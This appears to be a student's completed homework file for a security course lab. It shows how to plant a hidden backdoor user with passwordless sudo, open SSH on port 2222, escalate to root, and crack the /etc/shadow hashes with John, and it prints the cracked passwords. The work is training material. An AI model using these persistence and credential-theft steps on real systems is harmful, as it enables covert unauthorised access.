

Week 6 Homework Submission File: Advanced Bash - Owning the System

Please edit this file by adding the solution commands on the line below the prompt.

Save and submit the completed file for your homework submission.

Step 1: Shadow People

1. Create a secret user named sysd. Make sure this user doesn't have a home folder created:

- Your solution command here `root:~\ $ useradd -rMo -u 666 sysd`

Our command to add the user is “useradd” with the flags “r” for creating a system user, “M” to not create a home directory for this user, “o” to allow duplicate UID in case one already exists in the system, “u” for UID which we’ll specify as “666” the devil’s number as we are doing malicious deeds on the system, and finally the username “sysd”

2. Give your secret user a password:
 - Your solution command here

```
root:~\ $ passwd sysd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
```

“Passwd” followed by the user allows password adding. For “sysd” we will give the password “123”

3. Give your secret user a system UID < 1000:

- Your solution command here `root:~\ $ usermod -u 666 sysd`
`usermod: no changes`

We already gave a UID, but here’s the command in case we didn’t. Usermod to modify the user and “u” flag to specify UID followed by a UID that’s under 1000.

4. Give your secret user the same GID:

- Your solution command here `root:~\ $ groupmod -g 666 sysd`

groupmod allows us to modify the group, “g” for the GID, same as our UID followed by the user “sysd”

```
root:~\ $ cat /etc/passwd | grep -i sysd
sysd:x:666:666::/home/sysd:/bin/sh
```

A quick piped command will show out UID and GID have successfully been implemented.

5. Give your secret user full sudo access without the need for a password:

So now we need to get into visudo which modifies our sudoers. So we’re going to:

- Your solution command here `root:~\ $ visudo`

Once in visudo, we’re going to add password permissions that enable no need for a password:

```
# User privilege specification
root    ALL=(ALL:ALL) ALL
sysd    ALL=(ALL:ALL) NOPASSWD:ALL
```

6. Test that sudo access works without your password:

```
root:~\ $ cat /etc/sudoers | grep -i sysd | awk '{print $3}'
NOPASSWD:ALL
```

We run a quick piped command. NOPASSWD:ALL is indeed working. Let’s run another test just to be sure.

```
root:ssh\ $ sudo -l
Matching Defaults entries for root on scavenger-hunt:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on scavenger-hunt:
    (ALL : ALL) ALL
```

It worked, Moving on...

Step 2: Smooth Sailing

1. Edit the sshd_config file:

```
#Port 22
Port 2222
```

Your bash commands here:

We added the additional port of “2222” as directed.

Step 3: Testing Your Configuration Update

1. Restart the SSH service:

- Your solution command here:

```
root:ssh\ $ sudo systemctl restart ssh.service
```

2. Exit the root account:

```
root:ssh\ $ exit
exit
sysadmin:~\ $ exit
logout
```

- Your solution command here

3. SSH to the target machine using your sysd account and port 2222:

- Your solution command here

```
sysadmin@UbuntuDesktop:~$ ssh sysd@192.168.6.105 -p 2222
sysd@192.168.6.105's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
```

4. Use sudo to switch to the root user:

- Your solution command here

```
$ sudo su
```

- 5.

Step 4: Crack All the Passwords

1. SSH back to the system using your sysd account and port 2222:

- Your solution command here

```
sysadmin@UbuntuDesktop:~$ ssh sysd@192.168.6.105 -p 2222
sysd@192.168.6.105's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
```

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2. Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file:

- Your solution command here

```
$ sudo su
```

```
root@scavenger-hunt:/etc# unshadow /etc/passwd /etc/shadow > passwords.txt
```

We're going to run unshadow here and combine the passwd list with everything in shadow for a single passwords.txt file. This makes it easier to run in one place. Now we use John to crack these passwords while using the list of passwords we already have.

```
root@scavenger-hunt:/etc# john passwords.txt
Loaded 8 password hashes with 8 different salts (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
computer      (stallman)
freedom       (babbage)
trustno1      (mitnik)
dragon        (lovelace)
123           (sysd)
lakers        (turing)
passw0rd      (sysadmin)
Goodluck!     (student)
8g 0:00:02:35 100% 2/3 0.05146g/s 618.2p/s 636.7c/s 636.7C/s Missy!...Jupiter!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@scavenger-hunt:/etc#
```